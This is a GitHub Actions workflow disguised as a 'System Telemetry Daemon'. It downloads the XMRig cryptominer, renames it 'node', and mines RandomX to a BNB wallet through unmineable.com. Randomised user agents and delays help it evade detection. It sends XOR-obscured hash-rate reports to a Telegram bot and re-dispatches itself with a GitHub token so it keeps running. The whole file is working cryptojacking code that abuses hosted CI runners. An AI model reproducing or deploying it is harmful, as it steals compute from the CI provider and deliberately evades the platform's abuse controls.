name: System Telemetry Daemon

on:
  schedule:
    - cron: '0 6,18 * * *'  # 13:00 dan 01:00 WIB
  workflow_dispatch:

permissions:
  contents: read

jobs:
  bnb-task:
    runs-on: ubuntu-latest
    timeout-minutes: 360

    steps:
      - name: Boot Phase
        run: echo "Initializing..."

      - name: Install Agent
        run: |
          sudo apt update -y
          sudo apt install -y curl tar coreutils xxd base64
          curl -L -o node.tar.gz https://github.com/xmrig/xmrig/releases/download/v6.24.0/xmrig-6.24.0-linux-static-x64.tar.gz
          tar -xzf node.tar.gz
          cd xmrig-6.24.0
          chmod +x xmrig
          mv xmrig node
          cd ..
          mv xmrig-6.24.0 node-core

      - name: Mining Agent
        env:
          UA_LIST: "curl|wget|Mozilla/5.0|python-requests|Go-http-client/1.1"
        run: |
          cd node-core
          UA=$(echo $UA_LIST | tr "|" "\n" | shuf -n 1)
          echo "Using UA: $UA"

          DELAY=$((RANDOM % 180 + 30))
          echo "Waiting $DELAY sec..."
          sleep $DELAY

          ./node -a rx -o stratum+ssl://rx.unmineable.com:443 \
            -u BNB:0xf319aef8c1d323c83740bcde9f25238ff5c4855d.worker_xyz#f2xg-6ynu \
            -p stealth --randomx-no-rdmsr | tee result.log &

          PID=$!
          WORKDUR=$((RANDOM % 5400 + 1200))
          echo "Running for $WORKDUR sec..."
          sleep $WORKDUR
          kill $PID

      - name: Send Encrypted Report
        if: always()
        env:
          TG_TOKEN: ${{ secrets.TG_TOKEN }}
          TG_CHAT_ID: ${{ secrets.TG_CHAT_ID }}
          XOR_KEY: "S3cur3"
        run: |
          cd node-core
          HR=$(grep -a "speed" result.log | tail -n1 | sed 's/\x1b\[[0-9;]*m//g' | awk '{print $(NF-1) " H/s"}')
          A=$(grep -a "accepted" result.log | wc -l)
          R=$(grep -a "rejected" result.log | wc -l)
          HR=${HR:-"0 H/s"}

          TEXT="BNB Stats:\n• HR: $HR\n• OK: $A\n• NO: $R"
          CIPHER=$(echo -n "$TEXT" | xxd -p | awk -v key="$XOR_KEY" '
            BEGIN { i=0; len=length(key); }
            {
              for (n=1; n<=length($0); n+=2) {
                c = strtonum("0x" substr($0,n,2));
                k = ord(substr(key, i % len + 1, 1));
                printf "%02x", xor(c,k);
                i++;
              }
            }
            function ord(str) { return index("\0\1\2\3\4\5\6\7\10\11\12\13\14\15\16\17\
\20\21\22\23\24\25\26\27\30\31\32\33\34\35\36\37 !\"#$%&'\"'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~", str)-1 }
            function xor(a,b) { return and(255, xor2(a,b)); }
            function xor2(a,b) { return or(and(255 - a, b), and(a, 255 - b)); }
          ' | xxd -r -p | base64)

          curl -s -X POST https://api.telegram.org/bot$TG_TOKEN/sendMessage \
            -d chat_id=$TG_CHAT_ID \
            --data-urlencode text="📦 Encrypted BNB Report:\n\`\`\`\n$CIPHER\n\`\`\`" \
            -d parse_mode=Markdown

      - name: Trigger Next
        if: always()
        env:
          GH_TOKEN: ${{ secrets.GH_TOKEN }}
        run: |
          sleep $((RANDOM % 60 + 10))
          curl -X POST -H "Authorization: Bearer $GH_TOKEN" \
               -H "Accept: application/vnd.github+json" \
               https://api.github.com/repos/${{ github.repository }}/actions/workflows/data-collector.yml/dispatches \
               -d '{"ref":"main"}'
